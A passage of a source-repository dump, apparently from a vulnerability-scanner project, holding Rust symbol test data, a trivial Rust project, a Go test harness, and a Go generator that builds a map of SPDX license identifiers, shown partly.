{}, "object::read::read_ref::ReadRef::read": {}, "object::read::read_ref::ReadRef::read_at": {}, "object::read::read_ref::ReadRef::read_bytes": {}, "object::read::read_ref::ReadRef::read_slice": {}, "object::read::read_ref::ReadRef::read_slice_at": {}, "object::read::util::Bytes::read": {}, "object::read::util::Bytes::read_at": {}, "object::read::util::Bytes::read_bytes": {}, "object::read::util::Bytes::read_bytes_at": {}, "object::read::util::Bytes::read_slice": {}, "object::read::util::Bytes::skip": {}, "object::read::util::StringTable::get": {}, "object::read::util::align": {}, "panic_unwind::real_imp::cleanup": {}, "panic_unwind::real_imp::panic": {}, "panic_unwind::real_imp::panic::exception_cleanup": {}, "rle_decode_fast::append_from_within": {}, "rle_decode_fast::lookbehind_length_fail": {}, "rle_decode_fast::rle_decode": {}, "rustc_demangle::Demangle::fmt": {}, "rustc_demangle::DemangleStyle::fmt": {}, "rustc_demangle::SizeLimitExhausted::fmt": {}, "rustc_demangle::SizeLimitedFmtAdapter::write_str": {}, "rustc_demangle::demangle": {}, "rustc_demangle::demangle::{{closure}}": {}, "rustc_demangle::is_ascii_punctuation": {}, "rustc_demangle::is_symbol_like": {}, "rustc_demangle::is_symbol_like::{{closure}}": {}, "rustc_demangle::legacy::Demangle::fmt": {}, "rustc_demangle::legacy::Demangle::fmt::{{closure}}": {}, "rustc_demangle::legacy::demangle": {}, "rustc_demangle::legacy::demangle::{{closure}}": {}, "rustc_demangle::legacy::is_rust_hash": {}, "rustc_demangle::legacy::is_rust_hash::{{closure}}": {}, "rustc_demangle::try_demangle": {}, "rustc_demangle::v0::Demangle::fmt": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars::{{closure}}": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars::{{closure}}::{{closure}}": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars::{{closure}}::{{closure}}::utf8_len_from_first_byte": {}, "rustc_demangle::v0::HexNibbles::try_parse_uint": {}, 
"rustc_demangle::v0::Ident::fmt": {}, "rustc_demangle::v0::Ident::fmt::{{closure}}": {}, "rustc_demangle::v0::Ident::punycode_decode": {}, "rustc_demangle::v0::Ident::try_small_punycode_decode": {}, "rustc_demangle::v0::Ident::try_small_punycode_decode::{{closure}}": {}, "rustc_demangle::v0::ParseError::message": {}, "rustc_demangle::v0::Parser::backref": {}, "rustc_demangle::v0::Parser::digit_10": {}, "rustc_demangle::v0::Parser::digit_62": {}, "rustc_demangle::v0::Parser::disambiguator": {}, "rustc_demangle::v0::Parser::eat": {}, "rustc_demangle::v0::Parser::hex_nibbles": {}, "rustc_demangle::v0::Parser::ident": {}, "rustc_demangle::v0::Parser::ident::{{closure}}": {}, "rustc_demangle::v0::Parser::integer_62": {}, "rustc_demangle::v0::Parser::namespace": {}, "rustc_demangle::v0::Parser::next": {}, "rustc_demangle::v0::Parser::opt_integer_62": {}, "rustc_demangle::v0::Parser::peek": {}, "rustc_demangle::v0::Parser::pop_depth": {}, "rustc_demangle::v0::Parser::push_depth": {}, "rustc_demangle::v0::Printer::eat": {}, "rustc_demangle::v0::Printer::eat::{{closure}}": {}, "rustc_demangle::v0::Printer::in_binder": {}, "rustc_demangle::v0::Printer::pop_depth": {}, "rustc_demangle::v0::Printer::print": {}, "rustc_demangle::v0::Printer::print_backref": {}, "rustc_demangle::v0::Printer::print_const": {}, "rustc_demangle::v0::Printer::print_const::{{closure}}": {}, "rustc_demangle::v0::Printer::print_const_str_literal": {}, "rustc_demangle::v0::Printer::print_const_uint": {}, "rustc_demangle::v0::Printer::print_dyn_trait": {}, "rustc_demangle::v0::Printer::print_generic_arg": {}, "rustc_demangle::v0::Printer::print_lifetime_from_index": {}, "rustc_demangle::v0::Printer::print_path": {}, "rustc_demangle::v0::Printer::print_path::{{closure}}": {}, "rustc_demangle::v0::Printer::print_path_maybe_open_generics": {}, "rustc_demangle::v0::Printer::print_path_maybe_open_generics::{{closure}}": {}, "rustc_demangle::v0::Printer::print_quoted_escaped_chars": {}, 
"rustc_demangle::v0::Printer::print_sep_list": {}, "rustc_demangle::v0::Printer::print_type": {}, "rustc_demangle::v0::Printer::print_type::{{closure}}": {}, "rustc_demangle::v0::Printer::skipping_printing": {}, "rustc_demangle::v0::basic_type": {}, "rustc_demangle::v0::demangle": {}, "rustc_demangle::v0::demangle::{{closure}}": {}, "smallvec::SmallVec::deref": {}, "smallvec::SmallVec::drop": {}, "smallvec::SmallVec::fmt": {}, "smallvec::SmallVec::insert_many": {}, "smallvec::SmallVec::push": {}, "smallvec::SmallVec::set_len": {}, "smallvec::SmallVec::spilled": {}, "smallvec::SmallVec::triple": {}, "smallvec::SmallVecData::heap": {}, "smallvec::SmallVecData::inline": {}, "std::alloc::default_alloc_error_hook": {}, "std::backtrace_rs::backtrace::Frame::ip": {}, "std::backtrace_rs::backtrace::libunwind::Frame::ip": {}, "std::backtrace_rs::backtrace::libunwind::trace": {}, "std::backtrace_rs::backtrace::libunwind::trace::trace_fn": {}, "std::backtrace_rs::backtrace::trace_unsynchronized": {}, "std::backtrace_rs::print::BacktraceFmt::new": {}, "std::backtrace_rs::print::BacktraceFrameFmt::drop": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_fileline": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_raw": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_raw_generic": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_raw_with_column": {}, "std::backtrace_rs::print::BacktraceFrameFmt::symbol": {}, "std::backtrace_rs::print::PrintFmt::eq": {}, "std::backtrace_rs::symbolize::ResolveWhat::address_or_ip": {}, "std::backtrace_rs::symbolize::Symbol::colno": {}, "std::backtrace_rs::symbolize::Symbol::filename_raw": {}, "std::backtrace_rs::symbolize::Symbol::lineno": {}, "std::backtrace_rs::symbolize::Symbol::name": {}, "std::backtrace_rs::symbolize::SymbolName::as_str": {}, "std::backtrace_rs::symbolize::SymbolName::as_str::{{closure}}": {}, "std::backtrace_rs::symbolize::SymbolName::fmt": {}, "std::backtrace_rs::symbolize::format_symbol_name": {}, 
"std::backtrace_rs::symbolize::gimli::Cache::avma_to_svma": {}, "std::backtrace_rs::symbolize::gimli::Cache::avma_to_svma::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Cache::avma_to_svma::{{closure}}::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Cache::mapping_for_lib": {}, "std::backtrace_rs::symbolize::gimli::Cache::mapping_for_lib::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Cache::new": {}, "std::backtrace_rs::symbolize::gimli::Cache::with_global": {}, "std::backtrace_rs::symbolize::gimli::Cache::with_global::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Context::new": {}, "std::backtrace_rs::symbolize::gimli::Context::new::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Mapping::mk": {}, "std::backtrace_rs::symbolize::gimli::Mapping::mk::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Mapping::mk_or_other": {}, "std::backtrace_rs::symbolize::gimli::Symbol::colno": {}, "std::backtrace_rs::symbolize::gimli::Symbol::filename_raw": {}, "std::backtrace_rs::symbolize::gimli::Symbol::lineno": {}, "std::backtrace_rs::symbolize::gimli::Symbol::name": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new_debug": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new_debug::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::build_id": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debugaltlink_path": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debugaltlink_path::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debuglink_path": {}, 
"std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debuglink_path::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::parse": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::parse::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::search_symtab": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::section": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::section::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::section_header": {}, "std::backtrace_rs::symbolize::gimli::elf::debug_path_exists": {}, "std::backtrace_rs::symbolize::gimli::elf::decompress_zlib": {}, "std::backtrace_rs::symbolize::gimli::elf::hex": {}, "std::backtrace_rs::symbolize::gimli::elf::locate_build_id": {}, "std::backtrace_rs::symbolize::gimli::elf::locate_debugaltlink": {}, "std::backtrace_rs::symbolize::gimli::elf::locate_debuglink": {}, "std::backtrace_rs::symbolize::gimli::libs_dl_iterate_phdr::callback": {}, "std::backtrace_rs::symbolize::gimli::libs_dl_iterate_phdr::native_libraries": {}, "std::backtrace_rs::symbolize::gimli::mmap": {}, "std::backtrace_rs::symbolize::gimli::mmap::Mmap::drop": {}, "std::backtrace_rs::symbolize::gimli::mmap::Mmap::map": {}, "std::backtrace_rs::symbolize::gimli::resolve": {}, "std::backtrace_rs::symbolize::gimli::resolve::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::stash::Stash::allocate": {}, "std::backtrace_rs::symbolize::gimli::stash::Stash::new": {}, "std::backtrace_rs::symbolize::gimli::stash::Stash::set_mmap_aux": {}, "std::backtrace_rs::symbolize::resolve_frame_unsynchronized": {}, "std::env::current_dir": {}, "std::env::current_exe": {}, "std::env::var_os": {}, "std::ffi::os_str::OsStr::display": {}, "std::ffi::os_str::OsStr::eq": {}, "std::ffi::os_str::OsStr::to_os_string": {}, "std::ffi::os_str::OsStr::to_owned": {}, "std::ffi::os_str::OsStr::to_str": {}, "std::ffi::os_str::OsString::eq": {}, "std::ffi::os_str::OsString::push": {}, 
"std::ffi::os_str::OsString::with_capacity": {}, "std::fs::File::metadata": {}, "std::fs::File::open": {}, "std::fs::FileType::is_dir": {}, "std::fs::FileType::is_file": {}, "std::fs::Metadata::is_dir": {}, "std::fs::Metadata::is_file": {}, "std::fs::OpenOptions::open": {}, "std::fs::canonicalize": {}, "std::fs::metadata": {}, "std::fs::read_link": {}, "std::io::Read::read_exact": {}, "std::io::Read::read_to_end": {}, "std::io::Take::read": {}, "std::io::Take::read_buf": {}, "std::io::Write::write_all": {}, "std::io::Write::write_fmt": {}, "std::io::Write::write_fmt::Adapter::write_str": {}, "std::io::buffered::bufwriter::BufWriter::drop": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::consume": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::done": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::drop": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::remaining": {}, "std::io::buffered::bufwriter::BufWriter::spare_capacity": {}, "std::io::buffered::bufwriter::BufWriter::with_capacity": {}, "std::io::buffered::bufwriter::BufWriter::write_all": {}, "std::io::buffered::bufwriter::BufWriter::write_all_cold": {}, "std::io::buffered::bufwriter::BufWriter::write_to_buffer_unchecked": {}, "std::io::buffered::linewriter::LineWriter::new": {}, "std::io::buffered::linewriter::LineWriter::with_capacity": {}, "std::io::buffered::linewriter::LineWriter::write_all": {}, "std::io::buffered::linewritershim::LineWriterShim::buffered": {}, "std::io::buffered::linewritershim::LineWriterShim::flush_if_completed_line": {}, "std::io::buffered::linewritershim::LineWriterShim::write_all": {}, "std::io::default_read_exact": {}, "std::io::default_read_to_end": {}, "std::io::error::\u003cimpl core::fmt::Debug for std::io::error::repr_bitpacked::Repr\u003e::fmt": {}, "std::io::error::Custom::fmt": {}, "std::io::error::Error::fmt": {}, 
"std::io::error::Error::from": {}, "std::io::error::Error::from_raw_os_error": {}, "std::io::error::Error::kind": {}, "std::io::error::Error::last_os_error": {}, "std::io::error::Error::new": {}, "std::io::error::ErrorKind::eq": {}, "std::io::error::ErrorKind::fmt": {}, "std::io::error::repr_bitpacked::Repr::data": {}, "std::io::error::repr_bitpacked::Repr::drop": {}, "std::io::error::repr_bitpacked::Repr::new_custom": {}, "std::io::error::repr_bitpacked::Repr::new_os": {}, "std::io::error::repr_bitpacked::decode_repr": {}, "std::io::error::repr_bitpacked::kind_from_prim": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read_buf": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read_exact": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read_buf": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read_exact": {}, "std::io::impls::\u003cimpl std::io::Write for \u0026mut W\u003e::write_all": {}, "std::io::impls::\u003cimpl std::io::Write for alloc::vec::Vec\u003e::write_all": {}, "std::io::readbuf::BorrowedBuf::filled": {}, "std::io::readbuf::BorrowedCursor::append": {}, "std::io::readbuf::BorrowedCursor::init_ref": {}, "std::io::readbuf::BorrowedCursor::set_init": {}, "std::io::stdio::Stderr::lock": {}, "std::io::stdio::Stderr::write_fmt": {}, "std::io::stdio::StderrLock::write_all": {}, "std::io::stdio::StderrRaw::write_all": {}, "std::io::stdio::Stdout::lock": {}, "std::io::stdio::Stdout::write_fmt": {}, "std::io::stdio::StdoutLock::write_all": {}, "std::io::stdio::StdoutRaw::write": {}, "std::io::stdio::StdoutRaw::write_all": {}, "std::io::stdio::cleanup": {}, "std::io::stdio::cleanup::{{closure}}": {}, "std::io::stdio::eprint": {}, "std::io::stdio::handle_ebadf": {}, "std::io::stdio::print": {}, "std::io::stdio::print_to": {}, 
"std::io::stdio::stdout": {}, "std::io::stdio::stdout::{{closure}}": {}, "std::os::fd::owned::OwnedFd::drop": {}, "std::panic::BacktraceStyle::as_usize": {}, "std::panic::BacktraceStyle::from_usize": {}, "std::panic::get_backtrace_style": {}, "std::panic::get_backtrace_style::{{closure}}": {}, "std::panic::set_backtrace_style": {}, "std::panicking::begin_panic_handler::PanicPayload::fill": {}, "std::panicking::begin_panic_handler::PanicPayload::fill::{{closure}}": {}, "std::panicking::begin_panic_handler::PanicPayload::get": {}, "std::panicking::begin_panic_handler::PanicPayload::new": {}, "std::panicking::begin_panic_handler::PanicPayload::take_box": {}, "std::panicking::begin_panic_handler::StrPanicPayload::get": {}, "std::panicking::begin_panic_handler::StrPanicPayload::take_box": {}, "std::panicking::begin_panic_handler::{{closure}}": {}, "std::panicking::default_hook": {}, "std::panicking::default_hook::{{closure}}": {}, "std::panicking::panic_count::increase": {}, "std::panicking::panic_count::increase::{{closure}}": {}, "std::panicking::rust_panic_with_hook": {}, "std::path::\u003cimpl core::convert::AsRef\u003cstd::path::Path\u003e for std::ffi::os_str::OsString\u003e::as_ref": {}, "std::path::Component::eq": {}, "std::path::Components::as_path": {}, "std::path::Components::clone": {}, "std::path::Components::eq": {}, "std::path::Components::finished": {}, "std::path::Components::has_root": {}, "std::path::Components::include_cur_dir": {}, "std::path::Components::is_sep_byte": {}, "std::path::Components::len_before_body": {}, "std::path::Components::next": {}, "std::path::Components::next_back": {}, "std::path::Components::parse_next_component": {}, "std::path::Components::parse_next_component::{{closure}}": {}, "std::path::Components::parse_next_component_back": {}, "std::path::Components::parse_next_component_back::{{closure}}": {}, "std::path::Components::parse_single_component": {}, "std::path::Components::prefix_len": {}, 
"std::path::Components::prefix_remaining": {}, "std::path::Components::prefix_verbatim": {}, "std::path::Components::trim_left": {}, "std::path::Components::trim_right": {}, "std::path::Display::fmt": {}, "std::path::Path::components": {}, "std::path::Path::has_root": {}, "std::path::Path::is_absolute": {}, "std::path::Path::is_dir": {}, "std::path::Path::is_dir::{{closure}}": {}, "std::path::Path::is_file": {}, "std::path::Path::is_file::{{closure}}": {}, "std::path::Path::parent": {}, "std::path::Path::parent::{{closure}}": {}, "std::path::Path::strip_prefix": {}, "std::path::Path::strip_prefix::{{closure}}": {}, "std::path::Path::to_str": {}, "std::path::PathBuf::deref": {}, "std::path::PathBuf::eq": {}, "std::path::PathBuf::from": {}, "std::path::PathBuf::push": {}, "std::path::PathBuf::push::{{closure}}": {}, "std::path::Prefix::clone": {}, "std::path::Prefix::eq": {}, "std::path::Prefix::len": {}, "std::path::PrefixComponent::eq": {}, "std::path::State::clone": {}, "std::path::State::eq": {}, "std::path::State::partial_cmp": {}, "std::path::StripPrefixError::fmt": {}, "std::path::has_physical_root": {}, "std::path::iter_after": {}, "std::personality::dwarf::DwarfReader::read": {}, "std::personality::dwarf::DwarfReader::read_sleb128": {}, "std::personality::dwarf::DwarfReader::read_uleb128": {}, "std::personality::dwarf::eh::find_eh_action": {}, "std::personality::dwarf::eh::read_encoded_pointer": {}, "std::personality::dwarf::eh::round_up": {}, "std::personality::gcc::find_eh_action": {}, "std::personality::gcc::find_eh_action::{{closure}}": {}, "std::personality::gcc::rust_eh_personality_impl": {}, "std::process::abort": {}, "std::rt::cleanup::{{closure}}": {}, "std::rt::lang_start_internal::{{closure}}": {}, "std::sync::once::Once::call_inner": {}, "std::sync::once::Once::call_once::{{closure}}": {}, "std::sync::once::Once::call_once_force": {}, "std::sync::once::Once::call_once_force::{{closure}}": {}, "std::sync::once::Once::is_completed": {}, 
"std::sync::once::WaiterQueue::drop": {}, "std::sync::once::wait": {}, "std::sync::once_lock::OnceLock::get": {}, "std::sync::once_lock::OnceLock::get_or_init": {}, "std::sync::once_lock::OnceLock::get_or_init::{{closure}}": {}, "std::sync::once_lock::OnceLock::get_or_try_init": {}, "std::sync::once_lock::OnceLock::initialize": {}, "std::sync::once_lock::OnceLock::initialize::{{closure}}": {}, "std::sync::once_lock::OnceLock::is_initialized": {}, "std::sys::common::alloc::realloc_fallback": {}, "std::sys::unix::abort_internal": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::alloc": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::alloc_zeroed": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::dealloc": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::realloc": {}, "std::sys::unix::alloc::aligned_malloc": {}, "std::sys::unix::args::imp::ARGV_INIT_ARRAY::init_wrapper": {}, "std::sys::unix::cleanup": {}, "std::sys::unix::cvt": {}, "std::sys::unix::cvt_r": {}, "std::sys::unix::decode_error_kind": {}, "std::sys::unix::fd::FileDesc::write": {}, "std::sys::unix::fs::File::file_attr": {}, "std::sys::unix::fs::File::open": {}, "std::sys::unix::fs::File::open_c": {}, "std::sys::unix::fs::File::open_c::{{closure}}": {}, "std::sys::unix::fs::FileType::is": {}, "std::sys::unix::fs::FileType::is_dir": {}, "std::sys::unix::fs::FileType::is_file": {}, "std::sys::unix::fs::canonicalize": {}, "std::sys::unix::fs::cstr": {}, "std::sys::unix::fs::readlink": {}, "std::sys::unix::fs::stat": {}, "std::sys::unix::fs::try_statx": {}, "std::sys::unix::fs::try_statx::statx": {}, "std::sys::unix::futex::futex_wait": {}, "std::sys::unix::futex::futex_wait::{{closure}}": {}, "std::sys::unix::futex::futex_wake": {}, "std::sys::unix::futex::futex_wake_all": {}, 
"std::sys::unix::locks::futex_mutex::Mutex::lock": {}, "std::sys::unix::locks::futex_mutex::Mutex::lock_contended": {}, "std::sys::unix::locks::futex_mutex::Mutex::spin": {}, "std::sys::unix::locks::futex_mutex::Mutex::try_lock": {}, "std::sys::unix::locks::futex_mutex::Mutex::unlock": {}, "std::sys::unix::locks::futex_mutex::Mutex::wake": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read_contended": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read_unlock": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_read": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_read::{{closure}}": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_until": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer_or_readers": {}, "std::sys::unix::locks::futex_rwlock::has_reached_max_readers": {}, "std::sys::unix::locks::futex_rwlock::is_read_lockable": {}, "std::sys::unix::locks::futex_rwlock::is_unlocked": {}, "std::sys::unix::memchr::memrchr": {}, "std::sys::unix::memchr::memrchr::memrchr_specific": {}, "std::sys::unix::os::current_exe": {}, "std::sys::unix::os::env_read_lock": {}, "std::sys::unix::os::errno": {}, "std::sys::unix::os::error_string": {}, "std::sys::unix::os::getcwd": {}, "std::sys::unix::os::getenv": {}, "std::sys::unix::os::page_size": {}, "std::sys::unix::os_str::Buf::push_slice": {}, "std::sys::unix::os_str::Buf::with_capacity": {}, "std::sys::unix::os_str::Slice::fmt": {}, "std::sys::unix::os_str::Slice::to_owned": {}, "std::sys::unix::os_str::Slice::to_str": {}, "std::sys::unix::path::is_sep_byte": {}, "std::sys::unix::stack_overflow::imp::cleanup": {}, "std::sys::unix::stack_overflow::imp::drop_handler": {}, "std::sys::unix::stack_overflow::imp::signal_handler": {}, "std::sys::unix::stdio::Stderr::write": {}, "std::sys::unix::stdio::Stdout::write": {}, "std::sys::unix::stdio::is_ebadf": {}, 
"std::sys::unix::thread_local_dtor::register_dtor": {}, "std::sys::unix::thread_local_key::create": {}, "std::sys::unix::thread_local_key::destroy": {}, "std::sys::unix::thread_local_key::get": {}, "std::sys::unix::thread_local_key::set": {}, "std::sys::unix::time::SystemTime::sub_time": {}, "std::sys::unix::time::Timespec::checked_add_duration": {}, "std::sys::unix::time::Timespec::partial_cmp": {}, "std::sys::unix::time::Timespec::sub_timespec": {}, "std::sys::unix::time::Timespec::to_timespec": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::SystemTime\u003e::now": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::Timespec\u003e::now": {}, "std::sys_common::backtrace::_print::DisplayBacktrace::fmt": {}, "std::sys_common::backtrace::_rust_begin_short_backtrace": {}, "std::sys_common::backtrace::_rust_end_short_backtrace": {}, "std::sys_common::backtrace::lock": {}, "std::sys_common::backtrace::output_filename": {}, "std::sys_common::backtrace::print": {}, "std::sys_common::backtrace::print_fmt": {}, "std::sys_common::backtrace::print_fmt::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}::{{closure}}": {}, "std::sys_common::memchr::memrchr": {}, "std::sys_common::mutex::MovableMutex::raw_lock": {}, "std::sys_common::mutex::MovableMutex::raw_unlock": {}, "std::sys_common::mutex::MovableMutex::try_lock": {}, "std::sys_common::mutex::StaticMutex::lock": {}, "std::sys_common::mutex::StaticMutexGuard::drop": {}, "std::sys_common::remutex::ReentrantMutex::increment_lock_count": {}, "std::sys_common::remutex::ReentrantMutex::lock": {}, "std::sys_common::remutex::ReentrantMutex::try_lock": {}, "std::sys_common::remutex::ReentrantMutexGuard::drop": {}, "std::sys_common::rwlock::StaticRwLock::read": {}, "std::sys_common::rwlock::StaticRwLockReadGuard::drop": {}, "std::sys_common::thread_info::THREAD_INFO::_getit": {}, 
"std::sys_common::thread_info::THREAD_INFO::_getit::destroy": {}, "std::sys_common::thread_info::ThreadInfo::with": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}::{{closure}}": {}, "std::sys_common::thread_info::current_thread": {}, "std::sys_common::thread_info::current_thread::{{closure}}": {}, "std::sys_common::thread_info::stack_guard": {}, "std::sys_common::thread_info::stack_guard::{{closure}}": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback::run_dtors": {}, "std::sys_common::thread_local_key::StaticKey::get": {}, "std::sys_common::thread_local_key::StaticKey::key": {}, "std::sys_common::thread_local_key::StaticKey::lazy_init": {}, "std::sys_common::thread_local_key::StaticKey::set": {}, "std::sys_common::thread_parker::futex::Parker::new": {}, "std::sys_common::thread_parker::futex::Parker::park": {}, "std::sys_common::thread_parker::futex::Parker::unpark": {}, "std::thread::Thread::clone": {}, "std::thread::Thread::cname": {}, "std::thread::Thread::name": {}, "std::thread::Thread::new": {}, "std::thread::Thread::unpark": {}, "std::thread::ThreadId::new": {}, "std::thread::ThreadId::new::exhausted": {}, "std::thread::current": {}, "std::thread::local::AccessError::fmt": {}, "std::thread::local::LocalKey::try_with": {}, "std::thread::local::LocalKey::with": {}, "std::thread::local::fast::Key::register_dtor": {}, "std::thread::park": {}, "std::time::SystemTime::duration_since": {}, "std::time::SystemTime::elapsed": {}, "std::time::SystemTime::now": {}, "str::fmt": {}, "test_rust_2::C::test_aabbee": {}, "test_rust_2::main": {}, "test_rust_2::other_item_123": {}, "u16::div": {}, "u16::forward_unchecked": {}, "u16::to_u64": {}, "u16::to_u8": {}, "u32::add": {}, "u32::checked_add": {}, "u32::checked_mul": {}, "u32::div": {}, "u32::shl": {}, "u32::to_u64": {}, "u32::to_u8": {}, "u64::add": {}, 
"u64::checked_add": {}, "u64::checked_mul": {}, "u64::div": {}, "u64::forward_unchecked": {}, "u64::from_u32": {}, "u64::mul": {}, "u64::to_u64": {}, "u64::to_u8": {}, "u8::bitand": {}, "u8::div": {}, "u8::from_elem": {}, "u8::rem": {}, "u8::to_u64": {}, "usize::add": {}, "usize::add_assign": {}, "usize::backward_unchecked": {}, "usize::div": {}, "usize::forward_unchecked": {}, "usize::from_u64": {}, "usize::from_u8": {}, "usize::get": {}, "usize::get_unchecked": {}, "usize::get_unchecked_mut": {}, "usize::index": {}, "usize::index_mut": {}, "usize::sub": {}, "usize::sum": {}, "usize::sum::{{closure}}": {}, "usize::to_u8": {} } ================================================ FILE: internal/sourceanalysis/testdata/rust/rust-project/.gitignore ================================================ target/ ================================================ FILE: internal/sourceanalysis/testdata/rust/rust-project/Cargo.toml ================================================ [package] name = "test-project" version = "0.1.0" edition = "2021" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [dependencies] # smallvec = "=0.6.13" ================================================ FILE: internal/sourceanalysis/testdata/rust/rust-project/src/main.rs ================================================ fn main() { println!("Hello, world!"); test_func(); } fn test_func() { println!("test func") } ================================================ FILE: internal/sourceanalysis/testmain_test.go ================================================ package sourceanalysis_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/spdx/gen.go ================================================ //go:build generate //go:generate go run gen.go package main import ( "encoding/json" "fmt" "go/format" 
"io/ioutil" "net/http" "strings" ) type License struct { SPDXID string `json:"licenseId"` } func main() { resp, err := http.Get("https://raw.githubusercontent.com/spdx/license-list-data/main/json/licenses.json") if err != nil { panic(err) } defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { panic(err) } var licenseList struct { Licenses []License `json:"licenses"` } err = json.Unmarshal(body, &licenseList) if err != nil { panic(err) } output := "// Code generated by gen.go. DO NOT EDIT.\n\n package spdx\nvar IDs = map[string]bool{\n" for _, license := range licenseList.Licenses { output += fmt.Sprintf("%q: true,\n", strings.ToLower(license.SPDXID)) } output += "}" formatted, err := format.Source([]byte(output)) if err != nil { panic(err) } err = ioutil.WriteFile("licenses.go", formatted, 0644) if err != nil { panic(err) } } ================================================ FILE: internal/spdx/licenses.go ================================================ // Code generated by gen.go. DO NOT EDIT. 
package spdx var IDs = map[string]bool{ "0bsd": true, "3d-slicer-1.0": true, "aal": true, "abstyles": true, "adacore-doc": true, "adobe-2006": true, "adobe-display-postscript": true, "adobe-glyph": true, "adobe-utopia": true, "adsl": true, "advanced-cryptics-dictionary": true, "afl-1.1": true, "afl-1.2": true, "afl-2.0": true, "afl-2.1": true, "afl-3.0": true, "afmparse": true, "agpl-1.0": true, "agpl-1.0-only": true, "agpl-1.0-or-later": true, "agpl-3.0": true, "agpl-3.0-only": true, "agpl-3.0-or-later": true, "aladdin": true, "alglib-documentation": true, "amd-newlib": true, "amdplpa": true, "aml": true, "aml-glslang": true, "ampas": true, "antlr-pd": true, "antlr-pd-fallback": true, "any-osi": true, "any-osi-perl-modules": true, "apache-1.0": true, "apache-1.1": true, "apache-2.0": true, "apafml": true, "apl-1.0": true, "app-s2p": true, "apsl-1.0": true, "apsl-1.1": true, "apsl-1.2": true, "apsl-2.0": true, "arphic-1999": true, "artistic-1.0": true, "artistic-1.0-cl8": true, "artistic-1.0-perl": true, "artistic-2.0": true, "artistic-dist": true, "aspell-ru": true, "aswf-digital-assets-1.0": true, "aswf-digital-assets-1.1": true, "baekmuk": true, "bahyph": true, "barr": true, "bcrypt-solar-designer": true, "beerware": true, "bitstream-charter": true, "bitstream-vera": true, "bittorrent-1.0": true, "bittorrent-1.1": true, "blessing": true, "blueoak-1.0.0": true, "boehm-gc": true, "boehm-gc-without-fee": true, "bola-1.1": true, "borceux": true, "brian-gladman-2-clause": true, "brian-gladman-3-clause": true, "bsd-1-clause": true, "bsd-2-clause": true, "bsd-2-clause-darwin": true, "bsd-2-clause-first-lines": true, 